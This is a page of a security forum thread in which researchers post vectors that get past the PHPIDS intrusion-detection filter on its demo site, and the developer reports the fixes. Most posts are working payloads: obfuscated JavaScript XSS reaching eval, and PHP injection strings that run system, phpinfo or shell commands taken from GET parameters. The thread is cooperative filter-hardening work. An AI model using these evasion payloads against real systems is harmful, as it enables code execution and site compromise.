Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 31
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 17, 2007 07:08PM

variations on thornmaker's alerts from the other day http://demo.phpids.org/?test=x%3D%21/x/%3F/x/-%2bd%3Aalert%0Ax%280%29 :
?test=x=!/x/?/x/-+d:alert
x(0)
?test=x=!#0={}?/x/-+x:alert
x(0)
?test=x=!disableExternalCapture?/x/-+text_goes_here:alert
x(0)
They can all be extended pretty much the same way for DoctorDan's alerts http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%2B1-1%3Aalert%0ax%281%29:
?test=x=!/\\/?{}+1-1:alert
x(1)

EDIT: Fixed encoding/display.

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/17/2007 07:32PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 17, 2007 08:46PM

this one is pretty self explanatory: http://p42.us/phpids/33.html

The JavaScript is:
x=/x/
x.a='n'
x.a=x.a+'ame'
x.b=''.eval
x.a=x.b(x.a)
x.a=x.b(x.a)

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 18, 2007 04:50AM

Hi!

Wow - those gave me a hard time. I returned from Berlin yesterday night and fixed the first problems with a pretty hot needle. The rule you mentioned was of course buggy - it was meant to be
\s
and not s. This part of the rule was deleted anyway :) I just modified the converter slightly to catch the more complicated ones. Also the centrifuge is now a bit more thorough. Great work guys - 10x!

I think in two or three days we can release 0.4.4.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 18, 2007 02:07PM

More PHP RCE:
http://demo.php-ids.org/?test=%22%3B%7Bif%20%28true%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//
";{if (true) $_a[]  = system;
$_a[0]( "ls"); } //
";{if (1) $_a[]  = system;
$_a[0]( "ls"); } //

Other ways of getting 'true' http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//
";{if (!($_b[]++%1)) $_a[]  = system;
$_a[0]( "ls"); } //
";{if (pi) $_a[]  = system;
$_a[0]( "ls");  } //
";{if (!a instanceof b) $_a[]  = system;
$_a[0]( "ls"); } //

EDIT: This gets caught (Score: 17), I just thought it was cool http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%24_l%5B%5D%3D_GET%29%20%24_l%3D%26%20%24%24_l%20%5B0%5D%3B%20//%0A%24_a%5B%5D%20%3D%24_l%20%5Bb%5D%20%3B%0A%24_a%20%5B0%5D%20%28%24_l%20%5B%20a%20%5D%20%29%3B%7D%20//:
";{if ($_l[]=_GET) $_l=& $$_l [0]; //
$_a[] =$_l  ;
$_a [0] ($_l [ a ] );} //
It executes $_GET['b']($_GET['a']);

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/18/2007 03:49PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 18, 2007 03:50PM

Nice! I like the method assignment via the implicit push. Fixed...

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 18, 2007 07:55PM

@.mario: nice fix. I've got a slight variant: http://demo.php-ids.org/?test=%22%3B//%0A%20if%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%20//
";//
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0]( "ls");  //

EDIT: encoded '+'

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/18/2007 10:44PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 19, 2007 02:59PM

More php code execution, this time with non-alpha non digit:
http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7F%3Dphpinfo%3B%20%24%7F%28%29%3B%20//
This uses chr(0x7f):
?test=";//
 $=phpinfo; $(); //
php allows chars 0x7f-0xff as valid in variable names, meaning this works: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7f%c9%e0%3Dphpinfo%3B%20%24%7f%c9%e0%28%29%3B%20//
so far 0x7f is the only one I've found that will evade the filter in and of itself though.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/19/2007 02:59PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 20, 2007 04:47AM

This gets through the XSS filters:-
\u50000=1
if(\u50000)\u50001=/eva/[-1]
if(\u50000)\u50002=/aler/[-1]
0[\u50001+'l'](\u50002+'t(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 20, 2007 07:13AM

@tx: Wow - I didn't know about that. Normally the char should have been converted by the outOfRange Converter - but I was accidentally using >=128 - not >=127 - 10x!

@Gareth: Fixed ;)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: December 21, 2007 06:51PM

Multiple semicolons break the comment regex:
http://demo.php-ids.org/?test=%22%3B%3B%20//%0A%20if%20%28%21%28%24_b%5B%5D++%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%21a.%20%22ls%22%29%3B%20%20//
?test=";; //
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0](!a. "ls");  //

Similar variation: http://demo.php-ids.org/?test=%22%3B%3B//%0Aif%281%29%24_a%5B0%5D%3Dsystem%3B%0A%24_a%5B0%5D%28%21php.%22ls%22%29%3B//
?test=";;//
if(1)$_a[0]=system;
$_a[0](!php."ls");//

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 22, 2007 03:00AM

70 characters:

x=/eva/i[-1]
$y=/nam/i[-1]
$x$_0=(0)[x+'l']
$x=$x$_0($y+'e')
$x$_0($x)

produces [p42.us].

Note that 0[eval] will no longer work in firefox 3. However all is not lost; x setter=eval still works (though is easily detected by phpids).

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 22, 2007 07:16AM

@tx: Thanks - I should have though about multiple semicolons :-/ Both ones are fixed!

@thornmaker: Nice - DoctorDan's trick combined with regex modifiers. I didn't concentrate on catching the 0[eval] though but on removing the Library XSS and enhancing some existing ones - so the rules shrank again :)

Greetings and happy holidays!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Spyware
Date: December 22, 2007 08:37AM

http://demo.php-ids.org/?test[]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 22, 2007 05:58PM

@Spyware: um - yes?

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Spyware
Date: December 22, 2007 06:28PM

I just noticed, that if you put [] after the "test" (in the url), it would output "Array". I have never seen any exploits or something using this glitch, but maybe it's exploitable in some way.

I now realize I have posted this in the wrong section of this forum, sorry.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 23, 2007 01:21AM

@spyware: I had never seen that before... very interesting.

@.mario: http://p42.us/phpids/35.html

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: December 23, 2007 05:26AM

Stefan Esser told me about one DOS attack which returns a white page on certain versions of PHP if you use a long multidimensional array like:-
test[][][][][][][][][]=1 etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 23, 2007 05:48AM

@Spyware: Ah okay - now I get it ;) It's missing validation before output. Thx for pointing out!

@thornmaker: I knew it - damn :) *fixing*



Edited 1 time(s). Last edit at 12/23/2007 06:38AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 23, 2007 10:47PM

http://p42.us/phpids/36.html

[Edit] added the following JavaScript for this one:
$x=(/val/)[-1]
$z=/nam/
$x=(0)['e'+$x]
$z=$z[-1]+'e'
$x($x($z)+'x')



Edited 1 time(s). Last edit at 12/29/2007 12:54PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: DoctorDan
Date: December 29, 2007 12:00PM

This is somewhat similar to thornmaker's above...
$y=('eva')
$z={}[$y+'l']
$y=('aler')
$y+=(/t(1)/)[-1]
$z($y)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: DoctorDan
Date: December 30, 2007 02:35PM

[$y=('al')]&&[$z=$y]&&[$z+=('ert')+[]][DocDan=(/ev/)[-1]+$y]($z).valueOf()(1)

EDIT: if I remember correctly, this may only work in FF2



Edited 1 time(s). Last edit at 12/30/2007 02:48PM by DoctorDan.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 30, 2007 03:25PM

DoctorDan: both are good finds!

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 01, 2008 05:16PM

Hey!

Yep - very nice ones indeed! I just returned from 24C3 and fixed the stuff - this time by doing some work on the centrifuge. I am not already sure that this fix will really work but let's see. I implemented a kind of ratio-check depending on the ration between string length and amount of certain special chars.

Greetings, 10x and happy new year!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 02, 2008 12:01AM

i've been losing track of the filtering behind the centrifuge... is this page no longer current?

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 02, 2008 06:58AM

Ah no - that was just the alpha version. The current revision can be found here (very last method).

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 04, 2008 04:19PM

This was super hard to sneak under the centrifuge:
http://demo.php-ids.org/?test=%22%3B%20e%7C%24a%3D%26%24_GET%3B%200%7C%24b%3D%21a%20.%24a%5Bb%5D%3B%24a%5Ba%5D%28%60%24b%60%29%3B//
?test="; e|$a=&$_GET; 0|$b=!a .$a;$a[a](`$b`);//
Even shorter:
?test="; e|$a=&$_GET; $a[a](`$a`);//
The code executes $_GET['a'](`$_GET['b']`) as in
http://localhost/rce.php
?eval="; e|$a=&$_GET; $a[a](`$a`);//
&a=printf
&b=touch some_file
EDIT: So $_GET['a'] would have to be a function like printf,sprintf,etc. and $_GET['b'] is what whould pass through to the command line.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 01/04/2008 04:22PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 04, 2008 06:38PM

Nice circumvention! Just fixed the issue and extended the tests with this kind of vectors. 10x!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 04, 2008 07:11PM

tx u rule! hehe top work!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/04/2008 07:12PM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 07, 2008 05:47PM

@Gareth,.mario: thx :)

I've got another. This is a variation on DoctorDan's vector, shortened to sneak under the centrifuge, which required a few other minor changes:
http://demo.phpids.org/?test=%5B%24y%3D%28%27al%27%29%5D%26%5B%24z%3D%24y+%27ert%27%5D%5Ba%3D%281%3F/ev/%3A0%29%5B-1%5D+%24y%5D%28%24z%29%281%29
[$y=('al')]&[$z=$y+'ert'][a=(1?/ev/:0)[-1]+$y]($z)(1)
Only tested in FF2, I don't know if it works in IE.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 08, 2008 03:25AM

Hi!

Wow - this is a nice one. DoctorDan's array to string conversion combined with a ternary test.

Thx!
.mario

Options: ReplyQuote
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 31


Sorry, only registered users may post in this forum.